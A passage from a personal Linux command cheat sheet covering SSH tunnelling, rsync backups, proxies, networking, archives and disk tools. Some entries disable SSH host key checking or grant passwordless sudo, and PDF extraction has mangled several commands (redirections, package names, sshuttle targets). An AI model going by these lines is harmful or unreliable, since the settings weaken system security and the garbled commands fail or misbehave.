-s packetsize Specifies the number of data bytes to be sent. The default is 56, which translates into 64 ICMP data bytes when combined with the 8 bytes (in my local system, 28 bytes) of ICMP header data. -M pmtudisc_opt Select Path MTU Discovery strategy. pmtudisc_option may be either do (prohibit fragmentation, even local one), want (do PMTU discovery, fragment locally when packet size is large), or dont (do not set DF flag).

# ping -c 1 -M do -s 1472 google.com PING google.com(173.194.113.167) 1472(1500) bytes of data. 1480 bytes from www.google.com(173.194.113.167): icmp_seq=1 ttl=42 time=262 ms

--- google.com ping statistics --- 1 packets transmitted,1 received,0% packet loss, time 0ms rtt min/avg/max/mdev= 262.920/262.920/262.920/0.000 m

30.1.26 Change owner of directory

$ chown -R or:or .

30.1.27 Locate/print block device attributes

# blkid /dev/sda6: UUID="2fc31bf0-68f1-4566-975b-cb995277db10" TYPE="swap" /dev/sda1: UUID="ec3c1569-29bb-4a63-bd75-337c57c7b600" TYPE="ext4"

30.1.28 Create a new UUID value

$ uuidgen d2ad5b28-b306-4096-aca2-dd66c37da5af

30.1.29 SSH

# socks5 proxy with dynamic tcp/ip $ ssh -D 8080 user@remote_host

$ ssh -L 8080:localhost:80 user@remote_host

162 Chapter 30. Linux Omid Raha MyStack Documentation, Release 0.1

# connect to remote running program on the remote host, for example TinyProxy $ ssh -N user@remote_host -L 8080:localhost:8888

30.1.30 Secure copy

$ scp -r Prj username@remote_ip:/directory/path/in/remote/ip/

30.1.31 Install SSH server and SSH client

$ sudo apt-get install -server $ sudo apt-get install openssh-client https://wiki.debian.org/SSH

30.1.32 Create a new ssh key

$ ssh-keygen -t rsa -C "[email protected]" Generating public/private rsa key pair. Enter file in which to save the key(/home/or/.ssh/id_rsa): /home/or/.ssh/bitbucket_

˓→rsa Enter passphrase(empty for no passphrase): Enter same passphrase again: Your identification has been saved in /home/or/.ssh/bitbucket_rsa. Your public key has been saved in /home/or/.ssh/bitbucket_rsa.pub. $ ssh-add ~/.ssh/bitbucket_rsa $ vim ~/.ssh/config IdentityFile ~/.ssh/bitbucket_rsa $ chmod 400 ~/.ssh/bitbucket_rsa

30.1.33 SSH connection with public key

$ vim ~/.ssh/authorized_keys # add public key

30.1.34 Disable the Password for Root Login

$ sudo vim /etc/ssh/sshd_config PasswordAuthentication no

$ sudo /etc/init.d/ssh restart

30.1.35 Youtube download trick

$ youtube-dl --no-mtime --verbose -i 'ytsearch100:table tennis training' --get-title $ youtube-dl --no-mtime --verbose -i 'ytsearch100:table tennis training'

30.1. Cmds 163 Omid Raha MyStack Documentation, Release 0.1

30.1.36 Run process as background and never die

$ nohup node server.js > /dev/null2>&1& $ ./run.py > /dev/null2>&1&

1. nohup means: Do not terminate this process even when the stty is cut off. 2. > /dev/null means: stdout goes to /dev/null (which is a dummy device that does not record any output). 3. 2>&1 means: stderr also goes to the stdout (which is already redirected to /dev/null). 4. & at the end means: run this command as a background task.

30.1.37 Eject CD/DVD-ROM eject - eject removable media

$ eject $ eject -t

-t With this option the drive is given a CD-ROM tray close command. Not all devices support this command.

30.1.38 Search for a package

$ apt-cache search package_name

30.1.39 Un mount cd-rom device that is busy error

# umount /cdrom # fuser -km /cdrom # umount -l /mnt

30.1.40 Login with linux FTP username and password

$ ftp ftp://username:[email protected]

30.1.41 Download torrent

$ aria2c download.torrent

30.1.42 Debug SSH

# ssh -vT [email protected]

164 Chapter 30. Linux Omid Raha MyStack Documentation, Release 0.1

30.1.43 Detect ssh authentication types available ssh -o PreferredAuthentications=none 127.0.0.1 Permission denied(publickey,password). ssh -o PreferredAuthentications=none 127.0.0.2 Permission denied(publickey). ssh -o PreferredAuthentications=none 127.0.0.3 Permission denied(publickey,gssapi-keyex,gssapi-with-mic,password). http://stackoverflow.com/questions/3585586/how-can-i-programmatically-detect-ssh-authentication-types-available

30.1.44 Avoid SSH’s host verification for known hosts? ssh -o "StrictHostKeyChecking no" 127.0.0.1 http://superuser.com/questions/125324/how-can-i-avoid-sshs-host-verification-for-known-hosts

30.1.45 Set environment variables on linux

$ export PATH=${PATH}:/home/or/bin

30.1.46 Base64 decode encode or@debian:~$ echo 'Test' | base64 VGVzdAo= or@debian:~$ echo 'Test' | base64 | base64 -d Test

30.1.47 Extract compressed files

# Decompressed a file that is created using gzip command. # File is restored to their original form using this command. $ gzip -d mydata.doc.gz $ gunzip mydata.doc.gz

# Decompressed a file that is created using bzip2 command. # File is restored to their original form using this command. $ bzip2 -d mydata.doc.bz2 $ gunzip mydata.doc.bz2

# Extract compressed files in a ZIP archive. $ unzip file.zip $ unzip data.zip resume.doc

# Untar or decompressed a file(s) that is created using tar compressing through gzip

˓→and bzip2 filter $ tar -zxvf data.tgz (continues on next page)

30.1. Cmds 165 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) $ tar -zxvf pics.tar.gz *.jpg $ tar -jxvf data.tbz2

# Extract tar files and to another directory $ tar -xvf archive.tar -C /target/directory

# List files from a GZIP archive $ gzip -l mydata.doc.gz

# List files from a ZIP archive $ unzip -l mydata.zip

# List files from a TAR archive $ tar -ztvf pics.tar.gz $ tar -jtvf data.tbz2

# To unzip a file that is only compressed with bz2 use $ bunzip2 filename.bz2

# To unzip things that are compressed with .tar.bz2 use $ tar -xvjpf filename.tar.bz2

# To unzip things that are compressed with .gz use $ gunzip file.doc.gz

# Don't store full absolute paths in the archive # This will archive `/home/or/ws/data` directory without absolute path to the `data.

˓→tar` file $ tar -cf data.tar -C /home/or/ws/ data

Options for tar files: Type at the command prompt tar xvzf file-1.0.tar.gz – to uncompress a gzip tar file (.tgz or .tar.gz) tar xvjf file-1.0.tar.bz2 – to uncompress a bzip2 tar file (.tbz or .tar.bz2) tar xvf file-1.0.tar – to uncompressed tar file (.tar) x = eXtract, this indicated an extraction c = create to create ) v = verbose (optional) the files with relative locations will be displayed. z = gzip-ped; j = bzip2-zipped f = from/to file . . . (what is next after the f is the archive file) The files will be extracted in the current folder. HINT: if you know that a file has to be in a certain folder, move to that folder first. Then download, then uncompress – all in the correct folder. Yes, I’m lazy.. no I don’t like to copy files between directories, and then delete others to clean up. Download them in the correct directory and save yourself 2 jobs.

30.1.48 List All Environment Variables

$ env

$ printenv

$ printenv | less

$ printenv | more

166 Chapter 30. Linux Omid Raha MyStack Documentation, Release 0.1

30.1.49 Set Environment variable

$ export MY_VAR="my_val"

30.1.50 Set proxy in command line

$ export http_proxy="http://127.0.0.1:8080" $ export https_proxy="https://127.0.0.1:8080" $ export ftp_proxy="http://127.0.0.1:8080"

30.1.51 How can I tunnel all of my network traffic through SSH? http://superuser.com/questions/62303/how-can-i-tunnel-all-of-my-network-traffic-through-ssh

$ sudo sshuttle --dns -vvr username@remote_ip.1210/0

30.1.52 How can you completely remove a package? http://askubuntu.com/questions/151941/how-can-you-completely-remove-a-package

$ sudo apt-get purge package_name

This does not remove packages that were installed as dependencies, when you installed the package you’re now removing. Assuming those packages aren’t dependencies of any other packages, and that you haven’t marked them as manually installed, you can remove the dependencies with:

$ sudo apt-get autoremove or (if you want to delete their systemwide configuration files too):

$ sudo apt-get --purge autoremove

30.1.53 How to forward X over SSH from Ubuntu machine . . . http://unix.stackexchange.com/questions/12755/how-to-forward-x-over-ssh-from-ubuntu-machine X11 forwarding needs to be enabled on both the client side and the server side. On the client side, the -X (capital X) option to ssh enables X11 forwarding, and you can make this the default (for all connections or for a specific conection) with ForwardX11 yes in ~/.ssh/config. On the server side, edit the /etc/ssh/sshd_config file, and uncomment the following line:

X11Forwarding Yes

The xauth program must be installed on the server side.

30.1. Cmds 167 Omid Raha MyStack Documentation, Release 0.1

$ aptitude install xauth

After making this change, you will need to restart the SSH server. To do this on most UNIX’s, run:

$ /etc/init.d/sshd restart

To confirm that ssh is forwarding X11, Check for a line containing Requesting X11 forwarding in the output:

$ ssh -v -X USER@SERVER

Note that the server won’t reply either way.

30.1.54 SOCKS server and/or client http://www.delegate.org/delegate/SOCKS/ http://ajitabhpandey.info/2011/03/delegate-a-multi-platform-multi-purpose-proxy-server/ Download delegate from http://delegate.hpcc.jp/anonftp/DeleGate/bin/linux/latest/ and extract it. Then run binary file as: Run a Http proxy that is connected to a :

$ ./dg9_9_13 -P8080 SERVER=http SOCKS=127.0.0.1:9150 ADMIN="[email protected]"

$ youtube-dl -v --proxy "http://127.0.0.1:8080" https://www.youtube.com/watch?v=VID

30.1.55 SSH hangs on debug1: expecting SSH2_MSG_KEX_ECDH_REPLY

Edit /etc/ssh/ssh_config, uncomment the following lines

Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc GSSAPIAuthentication yes GSSAPIDelegateCredentials no MACs hmac-md5,hmac-sha1,[email protected],hmac-ripemd160

Add the following line:

HostKeyAlgorithms ssh-rsa,ssh-dss

Also change MTU may be useful: ifconfig eth0 mtu 578 http://superuser.com/questions/699530/git-pull-does-nothing-git-push-just-hangs-debug1-expecting-ssh2-msg-kex-ecd

30.1.56 What will this command do?

$ exec2>&1

168 Chapter 30. Linux Omid Raha MyStack Documentation, Release 0.1

The 1 number refer to stdout, and The 2 number refer to stderr it duplicates, or copies, stderr onto stdout. When you run a program, you’ll get the normal output in stdout, but any errors or warnings usually go to stderr. If you want to pipe all output to a file for example, it’s useful to first combine stderr with stdout with 2>&1 http://stackoverflow.com/questions/1216922/sh-command-exec-21 http://www.catonmat.net/blog/bash-one-liners-explained-part-three/

30.1.57 Sample guake script

$ vim /home/or/workspace/bin/start.guake.sh guake -r "OR"; guake -n New_Tab -r "root"; -e "su"; guake -n New_Tab -r "Ipython 2" -e "ipython"; guake -n New_Tab -r "workspace" -e "cd /home/or/workspace/;clear;"; guake -n New_Tab -r "prj" -e "cd /home/or/workspace/prj/;clear;"; guake -n New_Tab -r "dg" -e "cd /home/or/workspace/Tools/dg/dg9_9_13/DGROOT/bin/;

˓→clear;";

$ chmod +x vim /home/or/workspace/bin/start.guake.sh

30.1.58 Verify that apt is pulling from the right repository

$ apt-cache policy

Example:

$ apt-cache policy docker-engine

Output:

Installed:1.9.1-0~stretch Candidate:1.9.1-0~stretch Version table: *** 1.9.1-0~stretch 500 500 https://apt.dockerproject.org/repo debian-stretch/main amd64

˓→Packages 100 /var/lib/dpkg/status 1.9.0-0~stretch 500 500 https://apt.dockerproject.org/repo debian-stretch/main amd64

˓→Packages 1.8.3-0~stretch 500 500 https://apt.dockerproject.org/repo debian-stretch/main amd64

˓→Packages 1.8.2-0~stretch 500 500 https://apt.dockerproject.org/repo debian-stretch/main amd64

˓→Packages 1.8.1-0~stretch 500 500 https://apt.dockerproject.org/repo debian-stretch/main amd64

˓→Packages 1.8.0-0~stretch 500 (continues on next page)

30.1. Cmds 169 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) 500 https://apt.dockerproject.org/repo debian-stretch/main amd64

˓→Packages 1.7.1-0~stretch 500 500 https://apt.dockerproject.org/repo debian-stretch/main amd64

˓→Packages 1.7.0-0~stretch 500 500 https://apt.dockerproject.org/repo debian-stretch/main amd64

˓→Packages 1.6.2-0~stretch 500 500 https://apt.dockerproject.org/repo debian-stretch/main amd64

˓→Packages 1.6.1-0~stretch 500 500 https://apt.dockerproject.org/repo debian-stretch/main amd64

˓→Packages 1.6.0-0~stretch 500 500 https://apt.dockerproject.org/repo debian-stretch/main amd64

˓→Packages 1.5.0-0~stretch 500 500 https://apt.dockerproject.org/repo debian-stretch/main amd64

˓→Packages

30.1.59 Operation not permitted on file with root access

# ls -la /etc/resolv.conf -r--r--r--1 root root 56 Jan7 22:39 /etc/resolv.conf

# chmod u+rwx /etc/resolv.conf chmod: changing permissions of ‘/etc/resolv.conf’: Operation not permitted

# lsattr /etc/resolv.conf ----i------e-- /etc/resolv.conf

# chattr -i /etc/resolv.conf # lsattr /etc/resolv.conf ------e-- /etc/resolv.conf

30.1.60 rsync and sudo over SSH

Add the line ALL=NOPASSWD:, where username is the login name of the user that rsync will use to log on. That user must be able to use sudo Note: Put the line after all other lines in the sudoers file! I first added the line after other user configurations, but it only worked when placed as absolutely last line in file on lubuntu 14.04.1.

$ sudo visudo ALL=NOPASSWD:

Example:

$ which rsync /usr/bin/rsync

(continues on next page)

170 Chapter 30. Linux Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) $ sudo visudo ubuntu ALL=NOPASSWD:/usr/bin/rsync https://askubuntu.com/a/719440 http://stackoverflow.com/questions/21659637/how-to-fix-sudo-no-tty-present-and-no-askpass-program-specified-error

30.1.61 How to backup with rsync

$ rsync -avz -e ssh --rsync-path="sudo rsync" @:/path/on/

˓→remote/host/to/backup /path/on/local/host/to/save/backup

Using rsync for local backups

$ rsync -av --delete /Directory1/ /Directory2/

-a recursive (recurse into directories), links (copy symlinks as symlinks), perms (preserve permissions), times (preserve modification times), group (preserve group), owner (preserve owner), preserve device files, and preserve special files. -v verbose. The reason I think verbose is important is so you can see exactly what rsync is backing up. Think about this: What if your hard drive is going bad, and starts deleting files without your knowledge, then you run your rsync script and it pushes those changes to your backups, thereby deleting all instances of a file that you did not want to get rid of? –delete This tells rsync to delete any files that are in Directory2 that aren’t in Directory1. If you choose to use this option, I recommend also using the verbose options, for reasons mentioned above.

30.1.62 Full Daily Backup with Syncing Hourly Backup by rsync and cron

$ crontab -e

0 */2 *** hourly_sync_backup.sh 0 */8 *** daily_full_archive_backup.sh

$ service cron restart

$ vim hourly_sync_backup.sh rsync -avz -e ssh --rsync-path="sudo rsync" @:/path/on/

˓→remote/host/to/backup /path/on/local/host/to/save/hourly_sync_backup

$ vim daily_full_archive_backup.sh rsync -avz -e ssh --rsync-path="sudo rsync" @:/path/on/

˓→remote/host/to/backup /path/on/local/host/to/save/daily_full_archive_backup tar -P -cvjf /path/on/local/host/to/save/archives/daily_full_archive_backup_

˓→$(date +%Y_%m_%d).tar.bz2 /path/on/local/host/to/save/daily_full_archive_backup

30.1.63 Backup with rsync works but not in crontab

$ rsync -avze "ssh -i ~/.ssh/my_key" ...

30.1. Cmds 171 Omid Raha MyStack Documentation, Release 0.1 http://www.howtogeek.com/135533/how-to-use-rsync-to-backup-your-data-on-linux/?PageSpeed=noscript https://www.marksanborn.net/howto/use-rsync-for-daily-weekly-and-full-monthly-backups/

30.1.64 Sample ssh config file

$ vim ~/.ssh/config

Host HostName User IdentityFile ~/.ssh/_key

Host gb HostName github.com User omidraha IdentityFile ~/.ssh/github_key

$ ssh gb

30.1.65 Compress directory

$ tar -zcvf archive-name.tar.gz directory-name

Where: -z : Compress archive using gzip program -c: Create archive -v: Verbose i.e display progress while creating archive -f: Archive File name http://www.cyberciti.biz/faq/how-do-i-compress-a-whole-linux-or-unix-directory/

30.1.66 How to add path of a program to $PATH environment variable?

Edit .bashrc in your home directory and add the following line:

$ vim ~/.bashrc export PATH="/path/to/dir:$PATH" $ source ~/.bashrc

30.1.67 Could not open a connection to your authentication agent

$ eval`ssh-agent -s` http://stackoverflow.com/a/17848593

172 Chapter 30. Linux Omid Raha MyStack Documentation, Release 0.1

30.1.68 How do I make ls show file sizes in megabytes?

$ ls -l --block-size=M $ ls -lh http://unix.stackexchange.com/a/64150

30.1.69 How to check one file exist on specific path ?

#!/usr/bin/env bash if test -f /path/to/some/file; then echo "File exist" fi

Or to check file dose not exist:

#!/usr/bin/env bash if test ! -f /path/to/some/file; then echo "File not exist" fi

30.1.70 what does echo $$, $? $# mean ?

$ echo $$, $$, $#,$ *

$$ is the PID of the current process. $? is the return code of the last executed command. $# is the number of arguments in $* $* is the list of arguments passed to the current process http://www.unix.com/shell-programming-and-scripting/75297-what-does-echo-mean.html

30.1.71 Make ZSH the default shell chsh -s $(which zsh)

30.1.72 ulimit

The ulimit and sysctl programs allow to limit system-wide resource use. This can help a lot in system administration, e.g. when a user starts too many processes and therefore makes the system unresponsive for other users.

$ ulimit -a core file size(blocks, -c)0 data seg size(kbytes, -d) unlimited scheduling priority(-e)0 file size(blocks, -f) unlimited pending signals(-i) 63619 (continues on next page)

30.1. Cmds 173 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) max locked memory(kbytes, -l) 64 max memory size(kbytes, -m) unlimited open files(-n) 65536 pipe size(512 bytes, -p)8 POSIX message queues(bytes, -q) 819200 real-time priority(-r)0 stack size(kbytes, -s) 8192 cpu time(seconds, -t) unlimited max user processes(-u) 63619 virtual memory(kbytes, -v) unlimited file locks(-x) unlimited

$ sudo sysctl -a www.linuxhowtos.org/Tips and Tricks/ulimit.htm

30.1.73 locate

$ sudo apt-get install mlocate $ updatedb $ locate some-resource-name

30.1.74 Posting Form Data with cURL

Start your cURL command with curl -X POST and then add -F for every field=value you want to add to the POST:

$ curl -X POST -F 'username=or'-F 'password=pass' http://domain.tld/post

30.1.75 Diff

Eskil is a graphical tool to view the differences between files and directories http://eskil.tcl.tk/index.html/doc/trunk/htdocs/download.html

30.1.76 Telegram

Telegramm-cli resolve_username tabletennis https://github.com/luckydonald/pytg/issues/64

30.1.77 Convert Socks into an HTTP proxy

$ sudo apt-get install polipo $ sudo service polipo stop

$ sudo vim /etc/polipo/config

(continues on next page)

174 Chapter 30. Linux Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) logSyslog= true logFile= /var/log/polipo/polipo.log

# HTTP Proxy proxyAddress= "0.0.0.0" proxyPort=8080

# Socks Proxy socksParentProxy= "127.0.0.1:9150" socksProxyType= socks5

chunkHighMark= 50331648 objectHighMark= 16384

serverMaxSlots= 64 serverSlots= 16 serverSlots1= 32

$ sudo service polipo restart

30.1.78 How to use sshuttle

$ sshuttle -r [email protected]/0 http://sshuttle.readthedocs.io/en/stable/usage.html#usage

30.1.79 locale.Error: unsupported locale setting

$ export LC_ALL="en_US.UTF-8" $ export LC_CTYPE="en_US.UTF-8" $ sudo dpkg-reconfigure locales https://stackoverflow.com/a/36257050

30.1.80 Shadowsocks

$ sudo pip install shadowsocks $ sudo ssserver -c ~/ws/shadowproxy.json --user nobody -d start

30.1.81 Capture and recording screen

$ sudo apt-get install byzanz $ byzanz-record -d 60 record.gif

30.1.82 Inotify Watches Limit

$ vim /etc/sysctl.conf fs.inotify.max_user_watches= 524288

30.1. Cmds 175 Omid Raha MyStack Documentation, Release 0.1

$ sudo sysctl -p –system https://confluence.jetbrains.com/display/IDEADEV/Inotify+Watches+Limit

30.1.83 Monitor multiple remote log files with MultiTail

$ sudo apt-get install multitail

# example for two log-files $ multitail log-file_a log-file_b

# example for two log-files and two columns $ multitail -s2 log-file_a log-file_a

# example for two log-files and different colors $ multitail -ci green log-file_a -ci yellow -I log-file_a

# example for one log file on remote $ multitail -l "ssh -t @ tail -f log-file"

# example for two log files on remote $ multitail -l "ssh -l @ tail -f log-file_a" -l "ssh -l @

˓→tail -f log-file_b"

30.1.84 Register GPG key by curl instead of dirmngr

$ sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys

˓→D6BC243565B2087BC3F897C9277A7293F59E4889

Error traceback:

Executing: /tmp/apt-key-gpghome.voccUPwlky/gpg.1.sh --keyserver hkp://keyserver.

˓→ubuntu.com:80 --recv-keys D6BC243565B2087BC3F897C9277A7293F59E4889 gpg: connecting dirmngr at '/run/user/0/gnupg/d.k4bafrtss9g1d86f8y5rxb8h/S.dirmngr'

˓→failed: IPC connect call failed gpg: keyserver receive failed: No dirmngr

Note that add 0x prefix before the 5523BAEEB01FA116 key

$ curl -sL "http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x5523BAEEB01FA116"

˓→| sudo apt-key add

30.1.85 Install fonts

$ sudo apt-get install font-manager

$ font-manager

176 Chapter 30. Linux Omid Raha MyStack Documentation, Release 0.1

30.1.86 Install tzdata noninteractive

$ apt-get install -y tzdata $ ln -fs /usr/share/zoneinfo/Asia/Tehran /etc/localtime $ dpkg-reconfigure --frontend noninteractive tzdata

If you are fine with UTC:

$ DEBIAN_FRONTEND=noninteractive apt-get install -y tzdata

30.1.87 Inotify Watches Limit

Error: External file changes sync slow: The current inotify limit is too low Fixed:

$ vim /etc/sysctl.conf

fs.inotify.max_user_watches= 524288

$ sudo sysctl -p --system https://confluence.jetbrains.com/display/IDEADEV/Inotify+Watches+Limit

30.2 Network

30.2.1 Watch network connections

$ watch ss -tp

30.2.2 Established connections

$ netstat lsof -i

30.2.3 Tcp connections

$ netstat -ant # -anu=udp

30.2.4 Connections with PIDs

$ netstat -tulpn

30.2. Network 177 Omid Raha MyStack Documentation, Release 0.1

30.2.5 List of listening ports

$ netstat -uanp

30.2.6 Capture packets

$ sudo apt-get install tcpdump $ sudo tcpdump -i wlan0 src port 80 or dst port 80 $ sudo apt-get install tshark $ tshark -i any http://jvns.ca/blog/2016/03/16/tcpdump-is-amazing/

30.2.7 Change the default gateway

$ sudo route del default $ sudo route add default gw 192.168.1.115

Or:

$ vim /etc/network/interfaces auto eth0 iface eth0 inet static address 192.168.1.119 netmask 255.255.255.0 broadcast 192.168.1.255 gateway 192.168.1.115 dns-nameservers8.8.8.88.8.4.4

30.2.8 Set a static IP

$ vim /etc/network/interfaces allow-hotplug eth0 iface eth0 inet static address 192.168.1.119 netmask 255.255.255.0 broadcast 192.168.1.255 gateway 192.168.1.115 dns-nameservers8.8.8.88.8.4.4

30.2.9 How do I install dig?

$ sudo apt-get istall dnsutils

178 Chapter 30. Linux Omid Raha MyStack Documentation, Release 0.1

30.2.10 Monitor bandwidth usage per process

$ sudo apt-get install nethogs $ nethogs -a

$ sudo apt-get install iptraf $ sudo iptraf-ng

$ watch -n1 netstat -tunap https://askubuntu.com/questions/532424/how-to-monitor-bandwidth-usage-per-process

30.2.11 Show your gateway

$ route -ne

30.2.12 Disable IP6

$ sudo vim /etc/sysctl.conf net.ipv6.conf.all.disable_ipv6=1 net.ipv6.conf.default.disable_ipv6=1 net.ipv6.conf.lo.disable_ipv6=1 $ sudo sysctl -p

30.2.13 Number of open connections per ip

$ netstat -ntu | awk -F"[ :]+" 'NR>2{print $6}'|sort|uniq -c|sort -nr

Specific port:

$ netstat -ntu | grep ":80\|:443" | awk -F"[ :]+" '{print $6}'|sort|uniq -c|sort -nr

Or: netstat -na | grep ":443\|:80" | grep -v LISTEN | awk '{print $5}' | cut -d: -f1 |

˓→sort | uniq -c | sort -rn | head

Output:

14 23.43.29.1 12 76.55.52.34 48.3.2.34 1 192.163.2.42 1 172.53.43.87

30.2.14 Connections types:

$ netstat -ant | awk 'NR>1{print $6}' | sort | uniq -c | sort -rn

30.2. Network 179 Omid Raha MyStack Documentation, Release 0.1

Output:

93 ESTABLISHED 15 TIME_WAIT 15 LISTEN 1 SYN_SENT 1 Foreign 1 CLOSE_WAIT

30.3 Hard

30.3.1 Commands to check hard disk partitions and disk space on Linux http://www.binarytides.com/linux-command-check-disk-partitions/ df

Df is not a partitioning utility, but prints out details about only mounted file systems. The list generated by df even includes file systems that are not real disk partitions. Here is a simple example

$ df -h Filesystem Size Used Avail Use% Mounted on /dev/sda6 97G 43G 49G 48%/ none4.0K04.0K0% /sys/fs/cgroup udev3.9G8.0K3.9G1% /dev 799M1.7M 797M1% /run none5.0M05.0M0% /run/lock none3.9G 12M3.9G1% /run/shm none 100M 20K 100M1% /run/user /dev/sda8 196G 154G 33G 83% /media/13f35f59-f023-4d98-b06f-9dfaebefd6c1 /dev/sda5 98G 37G 62G 38% /media/4668484A68483B47

Only the file systems that start with a /dev are actual devices or partitions. Use grep to filter out real hard disk partitions/file systems.

$ df -h | grep ^/dev /dev/sda6 97G 43G 49G 48%/ /dev/sda8 196G 154G 33G 83% /media/13f35f59-f023-4d98-b06f-9dfaebefd6c1 /dev/sda5 98G 37G 62G 38% /media/4668484A68483B47

To display only real disk partitions along with partition type, use df like this

$ df -h --output=source,fstype,size,used,avail,pcent,target -x tmpfs -x devtmpfs Filesystem Type Size Used Avail Use% Mounted on /dev/sda6 ext4 97G 43G 49G 48%/ /dev/sda8 ext4 196G 154G 33G 83% /media/13f35f59-f023-4d98-b06f-

˓→9dfaebefd6c1 /dev/sda5 fuseblk 98G 37G 62G 38% /media/4668484A68483B47

Note that df shows only the mounted file systems or partitions and not all.

180 Chapter 30. Linux Omid Raha MyStack Documentation, Release 0.1 lsblk

Lists out all the storage blocks, which includes disk partitions and optical drives. Details include the total size of the partition/block and the mount point if any. Does not report the used/free disk space on the partitions.

$ lsblk NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT sda8:00 465.8G0 disk sda18:10 70G0 part sda28:20 1K0 part sda58:50 97.7G0 part /media/4668484A68483B47 sda68:60 97.7G0 part / sda78:701.9G0 part[SWAP] sda88:80 198.5G0 part /media/13f35f59-f023-4d98-b06f-9dfaebefd6c1 sdb8:1613.8G0 disk sdb18:1713.8G0 part sr0 11:01 1024M0 rom

If there is no MOUNTPOINT, then it means that the file system is not yet mounted. For cd/dvd this means that there is no disk. Lsblk is capbale of displaying more information about each device like the label and model. blkid

Prints the block device (partitions and storage media) attributes like uuid and file system type. Does not report the space on the partitions.

$ sudo blkid /dev/sda1: UUID="5E38BE8B38BE6227" TYPE="" /dev/sda5: UUID="4668484A68483B47" TYPE="ntfs" /dev/sda6: UUID="6fa5a72a-ba26-4588-a103-74bb6b33a763" TYPE="ext4" /dev/sda7: UUID="94443023-34a1-4428-8f65-2fb02e571dae" TYPE="swap" /dev/sda8: UUID="13f35f59-f023-4d98-b06f-9dfaebefd6c1" TYPE="ext4" /dev/sdb1: UUID="08D1-8024" TYPE="vfat"

30.3.2 How to check Swap space in Linux

This will show your allocated swap disk or disks, if any: swapon -s

Type the following command to see total and used swap size: cat /proc/swaps

This will show both your memory and your swap usage:

# Size options are: -k, -m, -g $ free -m

30.3. Hard 181 Omid Raha MyStack Documentation, Release 0.1

30.3.3 Create iso image for swap https://www.digitalocean.com/community/tutorials/how-to-configure-virtual-memory-swap-file-on-a-vps

$ cd /var $ touch swap.img $ chmod 600 swap.img

# to crate 512MB image file $ dd if=/dev/zero of=/var/swap.img bs=1024k count=512 $ mkswap /var/swap.img $ swapon /var/swap.img

30.3.4 Remove swap

$ sudo swapoff /var/swap.img $ sudo rm /var/swap.img https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/3/html/System_Administration_Guide/ s1-swap-removing.html

30.3.5 Mount and UnMount usb

$ ls -la /dev/disk/by-uuid/ $ mkdir /mnt/sdc1 $ mount /dev/sdc1 /mnt/sdc1 # to unmount $ umount /dev/sdc1

30.3.6 What is a symbolic link?

A symbolic link, also termed a soft link, is a special kind of file that points to another file, much like a shortcut in Windows or a Macintosh alias. Unlike a hard link,a symbolic link does not contain the data in the target file, it simply points to another entry some- where in the file system. A hard link is where there are actually two entries in a file systems FAT table which go to the same memory location, as opposed to a symlink where one file points to another. with a hard link you can actually delete the original file, but as other links will remain, it is still available elsewhere. This difference gives symbolic links certain qualities that hard links do not have, such as the ability to link to direc- tories, or to files on remote computers networked through NFS. Also, when you delete a target file, symbolic links to that file become unusable, whereas hard links preserve the contents of the file. To create a symbolic link in Unix, at the Unix prompt, enter: ln -s source_file myfile

Replace source_file with the name of the existing file for which you want to create the symbolic link (this file can be any existing file or directory across the file systems). Replace myfile with the name of the symbolic link. The ln command then creates the symbolic link.

182 Chapter 30. Linux Omid Raha MyStack Documentation, Release 0.1

After you’ve made the symbolic link, you can perform an operation on or execute myfile, just as you could with the source_file. You can use normal file management commands (e.g., cp, rm) on the symbolic link. Note: If you delete the source file or move it to a different location, your symbolic file will not function properly. You should either delete or move it. If you try to use it for other purposes (e.g., if you try to edit or execute it), the system will send a “file nonexistent” message.

30.3.7 What is a hard link?

A hard link is essentially a label or name assigned to a file. Conventionally, we think of a file as consisting of a set of information that has a single name. However, it is possible to create a number of different names that all refer to the same contents. Commands executed upon any of these different names will then operate upon the same file contents. To make a hard link to an existing file, enter: ln oldfile newlink

Replace oldfile with the original filename, and newlink with the additional name you’d like to use to refer to the original file. This will create a new item in your working directory, newlink, which is linked to the contents of oldfile. The new link will show up along with the rest of your filenames when you list them using the ls command. This new link is not a separate copy of the old file, but rather a different name for exactly the same file contents as the old file. Consequently, any changes you make to oldfile will be visible in newlink. You can use the standard Unix rm command to delete a link. After a link has been removed, the file contents will still exist as long as there is one name referencing the file. Thus, if you use the rm command on a filename, and a separate link exists to the same file contents, you have not really deleted the file; you can still access it through the other link. Consequently, hard links can make it difficult to keep track of files. Furthermore, hard links cannot refer to files located on different computers linked by NFS, nor can they refer to directories. For all of these reasons, you should consider using a symbolic link, also known as a soft link, instead of a hard link.

30.3.8 Summarize disk usage of each FILE, recursively for directories

-h, --human-readable print sizes in human readable format (e.g., 1K 234M 2G) -s, --summarize display only a total for each argument

$ du -sh /home/or 12G /home/or

$ ncdu /home/or

30.3. Hard 183 Omid Raha MyStack Documentation, Release 0.1

30.3.9 Clean NTFS partition for windows cache files root@debian:/home/or# mount -a

The disk contains an unclean file system (0, 0). Metadata kept in Windows cache, refused to mount. Failed to mount ‘/dev/sdb6’: Operation not permitted The NTFS partition is in an unsafe state. Please resume and shutdown Windows fully (no hibernation or fast restarting), or mount the volume

# sudo apt-get install ntfsprogs

# sudo ntfsfix /dev/sda3 ntfsfix is a utility that fixes some common NTFS problems. ntfsfix is NOT a Linux version of chkdsk. It only repairs some fundamental NTFS inconsistencies, resets the NTFS journal file and schedules an NTFS consistency check for the first boot into Windows. You may run ntfsfix on an NTFS volume if you think it was damaged by Windows or some other way and it cannot be mounted. • http://askubuntu.com/questions/313872/ubuntu-13-04-is-unable-to-mount-a-disk-drive-from-ex-windows-system • http://askubuntu.com/a/71205/237607

30.3.10 Make sub directory

$ mkdir -p /new/sub/folder

30.3.11 How to Sort Folders by Size With One Command Line in Linux

